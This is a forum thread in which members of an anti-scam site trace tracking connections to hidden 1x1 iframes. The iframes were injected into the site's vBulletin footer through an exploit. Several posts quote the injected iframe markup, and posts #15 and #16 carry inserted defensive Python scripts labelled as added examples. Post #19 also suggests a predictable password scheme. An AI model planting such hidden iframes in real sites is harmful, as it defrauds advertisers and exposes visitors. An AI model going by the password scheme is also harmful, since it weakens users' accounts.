Page 1 of 3 (Results 1 to 25 of 51)

Thread: Strange Connections

  1. #1
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Strange Connections

    I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.

    When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.

    In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.

    You guys know about this?
    "A wise man proportions belief to the evidence."
    - David Hume

  2. #2
    littleroundman is offline Administrator
    Join Date
    Jun 2010
    Posts
    17,157

    Re: Strange Connections

    Your concerns are not strange at all, Wes.

    I'm not sure why McAfee is blocking mirror-image.com. My security software is not.

    mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites.
    Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods
    FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.

    This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic heavy pages loading slowly (as happens in any of the graphic heavy posts in the cash gifting subforum here on REALSCAM.com).

    As I post, the forum is linking to:

    ajax.googleapis.com
    ajax.googleapis.com is a CDN repository for the popular jquery javascript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work.
    damnxd.com
    We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.
    jobless-jack.com
    Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN
    weirdstuffs.com
    BBM Display Pictures | Facebook Covers | Jokes
    Facebook.com

    Google.com


    I would encourage anyone using Firefox who is concerned with cross-site requests to install the RequestPolicy Firefox addon.
    RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy, security, and speed by giving you control over cross-site requests.
    The only thing necessary for the triumph of evil is for good men to do nothing

  3. #3
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.

    I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.

    Thanks for your reply, LRM, but I still think it's strange.
    "A wise man proportions belief to the evidence."
    - David Hume

  4. #4
    littleroundman is offline Administrator
    Join Date
    Jun 2010
    Posts
    17,157

    Re: Strange Connections

    That's strange, Wes.

    I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.

    We'll check it out.

    Thanks for the info
    The only thing necessary for the triumph of evil is for good men to do nothing

  5. #5
    Whip is offline Anonymous. As are you all
    Join Date
    Jun 2010
    Posts
    5,930

    Re: Strange Connections

    I had an 'ad.yieldmanager' popup on my phone from here the other day.

  6. #6
    ribshaw is offline Nigerian Ministry
    Join Date
    Feb 2013
    Location
    Internet Cafe Nigeria
    Posts
    5,106

    Re: Strange Connections

    OK, I have had this happen twice, ads have started to play on my computer. Almost like a video ad. As soon as I shut down the site, the ad stops. Happened yesterday and just a second ago.
    "It's virtually impossible to violate rules ... but it's impossible for a violation to go undetected, certainly not for a considerable period of time." Bernie Madoff
    https://www.facebook.com/pages/Scam-...98399986981403

  7. #7
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?
    "A wise man proportions belief to the evidence."
    - David Hume

  8. #8
    ProfHenryHiggins is offline Elite Scambuster
    Join Date
    Mar 2011
    Posts
    2,826

    Re: Strange Connections

    I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
    Could something have slipped past Jason and gotten embedded? Or another 1 pixel graphic like MMB pulled on us a while back?


    On the other hand, I don't get the video ad popup, probably due to how my system is set up.
    If you are in Prosper With Integrity, and do not like that your personal information has been published here, please talk to these good people: http://www.attorneygeneral.gov http://www.ic3.gov http://www.fbi.gov

  9. #9
    Soapboxmom is offline Administrator
    Join Date
    Jun 2010
    Location
    Mars
    Posts
    7,964
    Blog Entries
    3

    Re: Strange Connections

    A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.

    As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!

  10. #10
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites; it looks like they all originated first from jobless-jack.com and damnxd.org (and this is on a page which does not have any non-stock images).

    [attachment: RS_cookies.jpg]

    Jason, what is the purpose of having these iframe lines included in forum.php?

    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    The comment about "do not remove" looks very fishy to me.
    Last edited by NikSam; 09-06-2013 at 09:47 AM.

  11. #11
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    The same thing is happening from my office computer.
    "A wise man proportions belief to the evidence."
    - David Hume

  12. #12
    Fendaril is offline Senior Member
    Join Date
    Feb 2013
    Posts
    461

    Re: Strange Connections

    Quote Originally Posted by Soapboxmom View Post
    All this does make me miss the simple times and my dial phone just a wee bit!
    I was never alive for the simple times, but I feel ya.

  13. #13
    Whip is offline Anonymous. As are you all
    Join Date
    Jun 2010
    Posts
    5,930

    Re: Strange Connections

    I don't automatically accept cookies so I get to see these just asked to be set when I tried to access this site from a different computer:

    widget3.linkwithin.com
    widget5.linkwithin.com
    widget6.linkwithin.com
    jobless-jack.com
    damnxd.org
    whos.amung.us
    rc.rlcdn.com
    lb.adnxs.com
    idsync.rlcdn.com

  14. #14
    scratchycat is offline Elite Scambuster
    Join Date
    Feb 2011
    Posts
    3,477
    Blog Entries
    2

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    There is definitely something wrong: on a dry run, accessing forum.php launches a rollercoaster of cookies from other sites; it looks like they all originated first from jobless-jack.com and damnxd.org (and this is on a page which does not have any non-stock images).

    [attachment: RS_cookies.jpg]

    Jason, what is the purpose of having these iframe lines included in forum.php?

    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    The comment about "do not remove" looks very fishy to me.
    Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.
    Don't get ripped off!! Stay informed!

  15. #15
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    So, anybody gonna remove that infected HTML code?

    As the VB original template shows:
    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
        <!-- Do not remove cronimage or your scheduled tasks will cease to function -->
        {vb:raw cronimage}
        <!-- Do not remove cronimage or your scheduled tasks will cease to function -->
        {vb:raw vboptions.copyrighttext}
    </div>
    Those infectious iframes are more likely coming from the vboptions.copyrighttext variable,
    resulting in:
    Code:
    <div id="footer_morecopyright" class="shade footer_morecopyright">
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	
    	<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
    	<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
    	
    </div>
    Please verify whether this code was put there by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text.

    And change admin passwords. (It might also have come from penetrating the MySQL db.)
    Last edited by NikSam; 09-13-2013 at 06:24 AM.
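    A defender-side check for the symptom described in posts #10 and #15: scan rendered page HTML for iframes that are effectively invisible (1x1) and point off-site. This is an added example, not code from the thread or from vBulletin; the sample footer is constructed from the markup quoted above, and the site host name realscam.com is an assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party host for the example (not taken from the forum's config).
SITE_HOST = "realscam.com"

# Constructed sample: the injected footer quoted in this thread, plus one
# same-site 1x1 image and one visible same-site iframe as non-findings.
SAMPLE_FOOTER = """
<div id="footer_morecopyright" class="shade footer_morecopyright">
  <!-- Do not remove cronimage or your scheduled tasks will cease to function -->
  <img src="http://realscam.com/cron.php?rand=1" width="1" height="1" />
  <br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe>
  <br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
  <iframe src="/help.html" width="500" height="300"></iframe>
</div>
"""

def _dim(value):
    """Parse a width/height attribute; unparseable or absent counts as visible."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return 10**6

class HiddenFrameFinder(HTMLParser):
    """Collect iframes that are 1x1 or smaller and whose src is not first-party."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src", "")
        # A relative src is served by the site itself.
        host = (urlparse(src).hostname or self.site_host).lower()
        if host.startswith("www."):
            host = host[4:]
        hidden = _dim(a.get("width")) <= 1 and _dim(a.get("height")) <= 1
        first_party = host == self.site_host or host.endswith("." + self.site_host)
        if hidden and not first_party:
            self.findings.append((host, src))

def find_hidden_third_party_iframes(html, site_host=SITE_HOST):
    parser = HiddenFrameFinder(site_host)
    parser.feed(html)
    return parser.findings

if __name__ == "__main__":
    for host, src in find_hidden_third_party_iframes(SAMPLE_FOOTER):
        print(f"hidden third-party iframe -> {host}: {src}")
```

    Run it against a saved copy of forum.php (or any rendered page) to confirm the footer is clean after the Copyright Text is cleared.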

  16. #16
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    UPDATE: It seems to be a VB exploit, so make sure to install the latest fixes so it doesn't happen again after removal of the Copyright Text;
    check for suspicious new admin accounts, php files which did not come from the stock vBulletin setup, and modifications to stock php files.

    https://forums.digitalpoint.com/thre...erted.2679354/


    To remove the Copyright Text, as pointed out there:
    You should be able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.

    more details on the exploit: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    Last edited by NikSam; 09-13-2013 at 06:49 AM.
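    One way to do the "non-stock php files and modified stock files" check from the post above: hash every .php file under the live webroot and compare against a manifest taken from a clean copy of the same vBulletin version. Added example, not the thread's or vBulletin's own code; the file names and contents in the demo are constructed.

```python
import hashlib
import os
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map relative path -> sha256 for every .php file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                manifest[rel] = sha256_file(full)
    return manifest

def compare_to_stock(stock_manifest, live_root):
    """Report php files that are new (absent from stock) or modified (hash differs)."""
    live = build_manifest(live_root)
    new = sorted(p for p in live if p not in stock_manifest)
    modified = sorted(p for p in live if p in stock_manifest and live[p] != stock_manifest[p])
    return {"new": new, "modified": modified}

def demo():
    """Constructed scenario: a stock tree and a live tree where one stock file
    was altered and one extra file was dropped in (names are made up)."""
    with tempfile.TemporaryDirectory() as stock, tempfile.TemporaryDirectory() as live:
        files = {"forum.php": "<?php echo 'stock forum'; ?>",
                 "includes/class_core.php": "<?php /* stock core */ ?>"}
        for rel, body in files.items():
            for root in (stock, live):
                path = os.path.join(root, rel)
                os.makedirs(os.path.dirname(path), exist_ok=True)
                with open(path, "w") as f:
                    f.write(body)
        with open(os.path.join(live, "forum.php"), "a") as f:
            f.write("\n<?php /* injected */ ?>")          # tampered stock file
        with open(os.path.join(live, "includes", "sh.php"), "w") as f:
            f.write("<?php /* not part of stock */ ?>")   # dropped-in file
        return compare_to_stock(build_manifest(stock), live)

if __name__ == "__main__":
    print(demo())
```

    In practice, generate the stock manifest from a freshly downloaded vBulletin package of the exact version in use, and treat anything in "new" or "modified" as needing manual review.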

  17. #17
    Soapboxmom is offline Administrator
    Join Date
    Jun 2010
    Location
    Mars
    Posts
    7,964
    Blog Entries
    3

  18. #18
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    See the PC World article as well. Especially this part:
    It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.

    Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.
    I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.

    And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.

    I would even consider shutting down the board until this is fixed.
    "A wise man proportions belief to the evidence."
    - David Hume

  19. #19
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Quote Originally Posted by wserra View Post
    ... I suggest that users must view their passwords to this site as compromised ...
    Passwords in VB are stored as hashes, so if it is not a dictionary word, short, or easy to brute force, it is not likely to be compromised.

    But I agree; as a general rule, never use the same password for different sites. Get a password management program if you must,
    or at least come up with a scheme to generate passwords for sites (like for GMail - mypass_gm).
    The most critical password a person has is to their email; even if you think there is nothing worth reading for someone, it can be used
    to reset your passwords on other sites (Banks, Paypal, etc.).

  20. #20
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    Passwords in VB are stored as hashes, so if it is not a dictionary word, short, or easy to brute force, it is not likely to be compromised.
    So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?
    "A wise man proportions belief to the evidence."
    - David Hume

  21. #21
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Ok, I already spotted newly created Administrators:
    View Profile: .
    View Profile: sky22

  22. #22
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Quote Originally Posted by NikSam View Post
    Ok, I already spotted newly created Administrators:
    View Profile: .
    View Profile: sky22
    Both created last week.

    Dum-da-DUM-DUM.
    "A wise man proportions belief to the evidence."
    - David Hume

  23. #23
    ribshaw is offline Nigerian Ministry
    Join Date
    Feb 2013
    Location
    Internet Cafe Nigeria
    Posts
    5,106

    Re: Strange Connections

    Would someone update the non-techy users as to what this means and a course of action? I am running AVG internet security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but I have no idea what any of this means behind the scenes.
    "It's virtually impossible to violate rules ... but it's impossible for a violation to go undetected, certainly not for a considerable period of time." Bernie Madoff
    https://www.facebook.com/pages/Scam-...98399986981403

  24. #24
    NikSam is offline AntiCon Artist
    Join Date
    Dec 2012
    Posts
    2,254

    Re: Strange Connections

    Ribshaw, your protections are only good for your own PC.

    RS itself has been compromised/hacked/penetrated by exploiting
    a programming mistake in the vBulletin software on which this forum runs.

    Whoever put those hidden iframes there is just generating views for their ads, even though you cannot see those ads (they are hidden in two 1x1 frames at the bottom, which are invisible).

    But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes, and perhaps already has.
    They can steal the database of users, install additional backdoors, modify content, etc.

  25. #25
    wserra is offline Senior Member
    Join Date
    Jun 2010
    Posts
    143

    Re: Strange Connections

    Think of it as RS having gained two new admins from the Russian mob.
    "A wise man proportions belief to the evidence."
    - David Hume
